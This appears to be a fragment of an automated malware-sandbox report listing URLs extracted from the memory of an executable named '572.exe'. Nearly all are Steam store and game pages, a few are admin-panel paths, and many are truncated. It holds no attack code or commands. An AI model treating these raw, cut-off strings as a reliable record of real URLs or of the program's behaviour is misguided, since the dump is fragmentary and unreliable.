                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=MPo6_B4f_g7D&am
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063A67000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4400981704.0000000047B85000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4097521546.0000000063AA0000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp;_cd
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.s
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.c
                Source: 572.exe, 00000009.00000003.4196885790.0000000047AF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4299205287.000000004061B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__12
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__global-responsive-menu
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__join
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/?snr=1_4_4__login
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/?snr=1_4_4__global-header
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/account/cookiepreferences/?snr=1_44_44_
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/admin.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/admin.phpo-?
                Source: 572.exe, 00000009.00000003.4390567048.0000000039128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/administrator/
                Source: 572.exe, 00000009.00000003.4523052924.000000004E0B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1057090/Ori_and_the_Will_of_the_Wisps/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1091500/Cyberpunk_2077/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1131620/Dominion/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1144200/Ready_or_Not/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1201540/HELLCARD/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1243830/Overcooked_All_You_Can_Eat/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1295630/Helskate/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1323830/Shanghai_Summer/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1329360/Lords_of_Exile/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1469610?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1479810/Legendary_Hoplite/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1493640/Banishers_Ghosts_of_New_Eden/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1544020/The_Callisto_Protocol/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1562430/DREDGE/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1562430?snr=1_4_4__40_2
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1573590/Colonize/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1578650/Citizen_Sleeper/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1578650?snr=1_4_4__40_1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1604030/V_Rising/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1621690/Core_Keeper/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1649950/News_Tower/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1662210/Arms_Trade_Tycoon_Tanks/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhome&snr=1_4_4__147
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhomeleftrail&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1675200/Steam_Deck/?utm_source=steamhometop&snr=1_4_4__125
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1693980/Dead_Space/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1746860/The_Elder_Scrolls_V_Skyrim_Anniversary_Upgrade/?snr=1_4_4
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1778820/TEKKEN_8/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1861440/CLeM/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1880470/The_Inquisitor/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1893810/Solium_Infernum/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1924780/Arzette_The_Jewel_of_Faramore/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1945360/Destiny_2_Lightfall__Annual_Pass/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1985320/Kdomon_Hyper_Auto_Battlers_Prologue/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/1990110/SpellRogue/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2019810/Boxes_Lost_Fragments/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2022670/SONIC_SUPERSTARS/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2051500/Soak__Splash/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2071500/Islands_of_Insight/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2072450/Like_a_Dragon_Infinite_Wealth/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2100140/Summon_Masters/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2161620/Lysfanga_The_Time_Shift_Warrior/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2161700/Persona_3_Reload/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2187220/Apollo_Justice_Ace_Attorney_Trilogy/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2190220/Touhou_Danmaku_Kagura_Phantasia_Lost/?snr=1_4_4__tab-Upco
                Source: 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2220360/Paper_Lily__Chapter_1/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/22370/Fallout_3_Game_of_the_Year_Edition/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2248950/TransSiberian_Railway_Simulator_Prologue/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2266420/Destiny_2_Legacy_Collection_2023/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2273430/BlazBlue_Entropy_Effect/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2321470/Deep_Rock_Galactic_Survivor/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2349140/KONOSUBA__Gods_Blessing_on_this_Wonderful_World_Love_For_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2386310/Ultros/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2410890/El_Dorado_The_Golden_City_Builder__Prologue/?snr=1_4_4__1
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2420880/WitchHand/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2431700/Vampire_The_Masquerade__Justice/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2436570/DRAGON_QUEST_BUILDERS/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2441700/UNDERDOGS/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2457580/Fight_Crab_2/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2478970/Tomb_Raider_IIII_Remastered_Starring_Lara_Croft/?snr=1_4_
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2485180/Cats_Hidden_in_Georgia/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/252490/Rust/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2582660/And_the_Hero_Was_Never_Seen_Again/?snr=1_4_4__tab-Upcomin
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2585040/GUNVOLT_RECORDS_Cychronicle/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2700560/Level_Unknown_Backrooms/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/271590/Grand_Theft_Auto_V/?snr=1_4_4__tab-TopGrossing
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2772560/Supermarket_Simulator_Prologue/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2776810/100_Ninja_Cats/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/2784840/Egg/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/315210/Suicide_Squad_Kill_the_Justice_League/?snr=1_4_4__145
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/513710/SCUM/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/518790/theHunter_Call_of_the_Wild/?snr=1_4_4__tab-Specials
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/553850/HELLDIVERS_2/?snr=1_4_4__tab-Upcoming
                Source: 572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4016423232.0000000063A90000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/559650/Witch_It/?snr=1_4_4__43_1
                Source: 572.exe, 00000009.00000003.4070644791.0000000064059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/app/559650/Witch_It/?snr=1_4_4__tab-Specials
